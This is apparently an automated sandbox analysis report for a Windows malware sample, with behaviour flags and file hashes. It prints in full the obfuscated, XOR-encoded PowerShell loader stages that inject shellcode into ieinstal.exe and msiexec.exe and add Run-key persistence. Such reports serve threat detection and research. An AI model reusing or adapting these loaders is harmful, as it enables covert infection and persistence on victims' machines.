DuBpCDASF A DbB DK2 D B DA9 D FACAA D B F 8MD 1 C C FH8 CSBHD 0IDDDLCGA DB7 D 1MD 0SE E D 1GD 7 Di0BC AID BCCTCa9B6 9 6DD 8EDU5ECPEZ9EES9HA FP1 CI8VDtBPC CmDGD D 6TDTFRD 0 DT0OD BNDC2F9JEA9WALEUD D 1 C 8NC DJDLB CADADH5BD B D BOD 0S9S7B9 2S9FE 9 6PF 9DF AOE AE9WE FHES9 6 E 5kFC7 D 0ZCTA EEESCUA C C ED3R9 2 9 E EH5PFD7SDE0WC ARE E CFA CRC EN3 9 2D9 EBES5kFE7 DT0vCDAEEOE C AeC CBEt3 9U2L9 E E 5 FL7DDF0GCDA E E CAADCLC E 3 9 2B9BEGE 5IF 7SDI0FCtAFEmEKC AEC CLEC3O9P7S9TEA9D6CE 5OFS7cDI0 CTADEmEnCLANCRCLE 3S9A7E9S7U9 7E' ;S&L( `$SFSo ruuCdUi nldSt aHgPeFtR7 ) u`$ ABl uAm n eOr s 2 ; `$ A lKuAmsnGedrTsP3B O= JBPeFtDaRtDeCsKtBe rWn e sD4 1K0J W'L9 ADF 4 DL1KDC0ED 7 CODDDSBGC C D 7BDL0 DS9GD BpCYC 9D0DFU7 D 0RCB8 D 1RDL5 D B 9 6 9DA FSCADZB CdD DS5 CCCFDF7bD 0 D 9 D BDCVCP8SDn9S2D9UA FUFBCHB CNCHD B D 0 D B 9T2C9NASF 4TDQ1HC DPD 7 D 0KDTF 9 2 8 EW9 2L8SES9V7P'F; &E(C`$TF oSr uDdDi nCdStHaHgOe tR7T)I G`$MA lBuKmFnFeSrBs 3F# ;""";;Function Alumners9 { param([String]$Ryatppes); For($Nedsivningsanlgs=1; $Nedsivningsanlgs -lt $Ryatppes.Length-1; $Nedsivningsanlgs+=(1+1)){ $Betatesternes41 = $Betatesternes41 + $Ryatppes.Substring($Nedsivningsanlgs, 1); } $Betatesternes41;}$Gynecocracy0 = Alumners9 ' F F K a N M T D T B S D S M F S H AIBE XF ';$Gynecocracy1= Alumners9 $Laryngologi;if([IntPtr]::size -eq 4+4){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Gynecocracy1 ;}else{.$Gynecocracy0 $Gynecocracy1;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Betatesternes410 { param([String]$Ryatppes); $myzontes = New-Object byte[] ($Ryatppes.Length / 2); For($Nedsivningsanlgs=0; $Nedsivningsanlgs -lt $Ryatppes.Length; $Nedsivningsanlgs+=2){ $Passionerede = $Ryatppes.Substring($Nedsivningsanlgs, 2); $myzontes[$Nedsivningsanlgs/2] = [convert]::ToByte($Passionerede, 16); $myzontes[$Nedsivningsanlgs/2] = ($myzontes[$Nedsivningsanlgs/2] -bxor 190); } [String][System.Text.Encoding]::ASCII.GetString($myzontes);}$Adjunctly0=Betatesternes410 'EDC7CDCADBD390DAD2D2';$Adjunctly1=Betatesternes410 'F3D7DDCCD1CDD1D8CA90E9D7D08D8C90EBD0CDDFD8DBF0DFCAD7C8DBF3DBCAD6D1DACD';$Adjunctly2=Betatesternes410 'F9DBCAEECCD1DDFFDADACCDBCDCD';$Adjunctly3=Betatesternes410 'EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD8';$Adjunctly4=Betatesternes410 'CDCACCD7D0D9';$Adjunctly5=Betatesternes410 'F9DBCAF3D1DACBD2DBF6DFD0DAD2DB';$Adjunctly6=Betatesternes410 'ECEAEDCEDBDDD7DFD2F0DFD3DB929EF6D7DADBFCC7EDD7D9929EEECBDCD2D7DD';$Adjunctly7=Betatesternes410 'ECCBD0CAD7D3DB929EF3DFD0DFD9DBDA';$Adjunctly8=Betatesternes410 'ECDBD8D2DBDDCADBDAFADBD2DBD9DFCADB';$Adjunctly9=Betatesternes410 'F7D0F3DBD3D1CCC7F3D1DACBD2DB';$Forudindtaget0=Betatesternes410 'F3C7FADBD2DBD9DFCADBEAC7CEDB';$Forudindtaget1=Betatesternes410 'FDD2DFCDCD929EEECBDCD2D7DD929EEDDBDFD2DBDA929EFFD0CDD7FDD2DFCDCD929EFFCBCAD1FDD2DFCDCD';$Forudindtaget2=Betatesternes410 'F7D0C8D1D5DB';$Forudindtaget3=Betatesternes410 'EECBDCD2D7DD929EF6D7DADBFCC7EDD7D9929EF0DBC9EDD2D1CA929EE8D7CCCACBDFD2';$Forudindtaget4=Betatesternes410 'E8D7CCCACBDFD2FFD2D2D1DD';$Forudindtaget5=Betatesternes410 'D0CADAD2D2';$Forudindtaget6=Betatesternes410 'F0CAEECCD1CADBDDCAE8D7CCCACBDFD2F3DBD3D1CCC7';$Forudindtaget7=Betatesternes410 'F7FBE6';$Forudindtaget8=Betatesternes410 'E2';$Overchannel=Betatesternes410 'EBEDFBEC8D8C';$Sovseskeen=Betatesternes410 'FDDFD2D2E9D7D0DAD1C9EECCD1DDFF';function fkp {Param ($Skolemestererer68, $Skiderik) ;$Judicative0 =Betatesternes410 '9AF7DACCD7D8CACDCACADBD2CDDBD08F878A9E839E96E5FFCECEFAD1D3DFD7D0E38484FDCBCCCCDBD0CAFAD1D3DFD7D090F9DBCAFFCDCDDBD3DCD2D7DBCD96979EC29EE9D6DBCCDB93F1DCD4DBDDCA9EC59E9AE190F9D2D1DCDFD2FFCDCDDBD3DCD2C7FDDFDDD6DB9E93FFD0DA9E9AE190F2D1DDDFCAD7D1D090EDCED2D7CA969AF8D1CCCBDAD7D0DACADFD9DBCA8697E5938FE390FBCFCBDFD2CD969AFFDAD4CBD0DDCAD2C78E979EC39790F9DBCAEAC7CEDB969AFFDAD4CBD0DDCAD2C78F97';&($Forudindtaget7) $Judicative0;$Judicative5 = Betatesternes410 '9AFDD1D0CADFD7D0DBCCD6DFC8D0DB9E839E9AF7DACCD7D8CACDCACADBD2CDDBD08F878A90F9DBCAF3DBCAD6D1DA969AFFDAD4CBD0DDCAD2C78C929EE5EAC7CEDBE5E3E39EFE969AFFDAD4CBD0DDCAD2C78D929E9AFFDAD4CBD0DDCAD2C78A9797';&($Forudindtaget7) $Judicative5;$Judicative1 = Betatesternes410 'CCDBCACBCCD09E9AFDD1D0CADFD7D0DBCCD6DFC8D0DB90F7D0C8D1D5DB969AD0CBD2D2929EFE96E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD8E396F0DBC993F1DCD4DBDDCA9EEDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD89696F0DBC993F1DCD4DBDDCA9EF7D0CAEECACC97929E969AF7DACCD7D8CACDCACADBD2CDDBD08F878A90F9DBCAF3DBCAD6D1DA969AFFDAD4CBD0DDCAD2C78B979790F7D0C8D1D5DB969AD0CBD2D2929EFE969AEDD5D1D2DBD3DBCDCADBCCDBCCDBCC888697979797929E9AEDD5D7DADBCCD7D59797';&($Forudindtaget7) $Judicative1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Unprincipledly18,[Parameter(Position = 1)] [Type] $Alfarytme = [Void]);$Judicative2 = Betatesternes410 '9AD0CBD1C8D19E839EE5FFCECEFAD1D3DFD7D0E38484FDCBCCCCDBD0CAFAD1D3DFD7D090FADBD8D7D0DBFAC7D0DFD3D7DDFFCDCDDBD3DCD2C79696F0DBC993F1DCD4DBDDCA9EEDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FFCDCDDBD3DCD2C7F0DFD3DB969AFFDAD4CBD0DDCAD2C7869797929EE5EDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FBD3D7CA90FFCDCDDBD3DCD2C7FCCBD7D2DADBCCFFDDDDDBCDCDE38484ECCBD09790FADBD8D7D0DBFAC7D0DFD3D7DDF3D1DACBD2DB969AFFDAD4CBD0DDCAD2C787929E9AD8DFD2CDDB9790FADBD8D7D0DBEAC7CEDB969AF8D1CCCBDAD7D0DACADFD9DBCA8E929E9AF8D1CCCBDAD7D0DACADFD9DBCA8F929EE5EDC7CDCADBD390F3CBD2CAD7DDDFCDCAFADBD2DBD9DFCADBE397';&($Forudindtaget7) $Judicative2;$Judicative3 = Betatesternes410 '9AD0CBD1C8D190FADBD8D7D0DBFDD1D0CDCACCCBDDCAD1CC969AFFDAD4CBD0DDCAD2C788929EE5EDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FDDFD2D2D7D0D9FDD1D0C8DBD0CAD7D1D0CDE38484EDCADFD0DADFCCDA929E9AEBD0CECCD7D0DDD7CED2DBDAD2C78F869790EDDBCAF7D3CED2DBD3DBD0CADFCAD7D1D0F8D2DFD9CD969AFFDAD4CBD0DDCAD2C78997';&($Forudindtaget7) $Judicative3;$Judicative4 = Betatesternes410 '9AD0CBD1C8D190FADBD8D7D0DBF3DBCAD6D1DA969AF8D1CCCBDAD7D0DACADFD9DBCA8C929E9AF8D1CCCBDAD7D0DACADFD9DBCA8D929E9AFFD2D8DFCCC7CAD3DB929E9AEBD0CECCD7D0DDD7CED2DBDAD2C78F869790EDDBCAF7D3CED2DBD3DBD0CADFCAD7D1D0F8D2DFD9CD969AFFDAD4CBD0DDCAD2C78997';&($Forudindtaget7) $Judicative4;$Judicative5 = Betatesternes410 'CCDBCACBCCD09E9AD0CBD1C8D190FDCCDBDFCADBEAC7CEDB9697';&($Forudindtaget7) $Judicative5 ;}$Biografierne = Betatesternes410 'D5DBCCD0DBD28D8C';$Judicative6 = Betatesternes410 '9AEECBD3CEDBCCD0DBCD9E839EE5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484F9DBCAFADBD2DBD9DFCADBF8D1CCF8CBD0DDCAD7D1D0EED1D7D0CADBCC9696D8D5CE9E9AFCD7D1D9CCDFD8D7DBCCD0DB9E9AF8D1CCCBDAD7D0DACADFD9DBCA8A97929E96F9FAEA9EFE96E5F7D0CAEECACCE3929EE5EBF7D0CA8D8CE3929EE5EBF7D0CA8D8CE3929EE5EBF7D0CA8D8CE3979E96E5F7D0CAEECACCE3979797';&($Forudindtaget7) $Judicative6;$Josina = fkp $Forudindtaget5 $Forudindtaget6;$Judicative7 = Betatesternes410 '9AFCDBCDD5CCD7D0D9DBCC8D9E839E9AEECBD3CEDBCCD0DBCD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E888B8E929E8EC68D8E8E8E929E8EC68A8E97';&($Forudindtaget7) $Judicative7;$Judicative8 = Betatesternes410 '9AFFCBCCDBD0DB9E839E9AEECBD3CEDBCCD0DBCD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E878D888D86888B88929E8EC68D8E8E8E929E8EC68A97';&($Forudindtaget7) $Judicative8;$Beskringer00='HKCU:\ahorntrerne\Soldebror';$Beskringer01 =Betatesternes410 '9AFFD2CBD3D0DBCCCD8396F9DBCA93F7CADBD3EECCD1CEDBCCCAC79E93EEDFCAD69E9AFCDBCDD5CCD7D0D9DBCC8E8E9790DBC6CACCDFCED1D2DFCADB';&($Forudindtaget7) $Beskringer01;$Judicative9 = Betatesternes410 '9AF4CBDAD7DDDFCAD7C8DB9E839EE5EDC7CDCADBD390FDD1D0C8DBCCCAE38484F8CCD1D3FCDFCDDB888AEDCACCD7D0D9969AFFD2CBD3D0DBCCCD97';&($Forudindtaget7) $Judicative9;$Alumners0 = Betatesternes410 'E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484FDD1CEC7969AF4CBDAD7DDDFCAD7C8DB929E8E929E9E9AFCDBCDD5CCD7D0D9DBCC8D929E888B8E97';&($Forudindtaget7) $Alumners0;$Omtumlet=$Judicative.count-650;$Alumners1 = Betatesternes410 'E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484FDD1CEC7969AF4CBDAD7DDDFCAD7C8DB929E888B8E929E9AFFCBCCDBD0DB929E9AF1D3CACBD3D2DBCA97';&($Forudindtaget7) $Alumners1;$Alumners2 = Betatesternes410 '9AF4D1D0D7CDDBCCD7D0D9DBCC9E839EE5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484F9DBCAFADBD2DBD9DFCADBF8D1CCF8CBD0DDCAD7D1D0EED1D7D0CADBCC9696D8D5CE9E9AF1C8DBCCDDD6DFD0D0DBD29E9AEDD1C8CDDBCDD5DBDBD097929E96F9FAEA9EFE96E5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3979E96E5F7D0CAEECACCE3979797';&($Forudindtaget7) $Alumners2;$Alumners3 = Betatesternes410 '9AF4D1D0D7CDDBCCD7D0D9DBCC90F7D0C8D1D5DB969AFCDBCDD5CCD7D0D9DBCC8D929AFFCBCCDBD0DB929AF4D1CDD7D0DF928E928E97';&($Forudindtaget7) $Alumners3#"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Adds policy Run key to start application
- Blocklisted process makes network request
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:988
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5e71c8443ae0bc2e282c73faead0a6dd3
SHA10c110c1b01e68edfacaeae64781a37b1995fa94b
SHA25695b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
SHA512b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55b1e521a9838e012df009e51fa1ac60b
SHA194a27c491edb06c910c9d7a9d6288d7f1767e78e
SHA256e6745b945cb1c1ff3a5f7b4b6c70f12bf5eb9ffc733d44ffb1f8c7561bf3098f
SHA512ce80df269aece40aadb41032434fb8c21c6b8fc0ae170d13feb9e5d53fd861e499d6e8f1a5708a206c84506e01e4518d7a3819f79d451d15b1ffbec3bba0567c
-
Filesize
61KB
MD5e71c8443ae0bc2e282c73faead0a6dd3
SHA10c110c1b01e68edfacaeae64781a37b1995fa94b
SHA25695b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
SHA512b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6
-
Filesize
444KB
MD5d71848944418c67f6eb230682f9a969a
SHA111d37a0eccbaf9995c6b236ff1a99d174a2566bd
SHA256efff0464180fcb34ec33e7835086ea58adc84bc3f0b08a7323ef1d58b258e59e
SHA5127baef376fb5f87e43124f79f81fe45567b7926be277a05abbbfe74bdbbe8dc49c238999e432fb4c457dff23ca78915d2a899bdde9a2ee79b77c655c17ebe706d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TXZV7S6ZQM7CK5FAZ0M5.temp
Filesize7KB
MD5f815cae08d83ae982d0fef8887550029
SHA14b06ccc65130f5140525dc6b99f1986292a850ef
SHA256e36036835807757aad8018868f4ae8f08eddc483a04c8eab330e1d1c50c2dc79
SHA51210d6de33aa2bf6564b95b056026af71873ba289b10b22b6eb2451185a14ba8e467c624908100992575ca263c945d2e2725c3d7a72e11617329604b80fe0c1acd
-
Filesize
849KB
MD587f9e5a6318ac1ec5ee05aa94a919d7a
SHA17a9956e8de89603dba99772da29493d3fd0fe37d
SHA2567705b87603e0d772e1753441001fcf1ac2643ee41bf14a8177de2c056628665c
SHA512c45c03176142918e34f746711e83384572bd6a8ed0a005600aa4a18cf22eade06c76eda190b37db49ec1971c4649e086affd19eee108c5f405df27c0c8cb23d2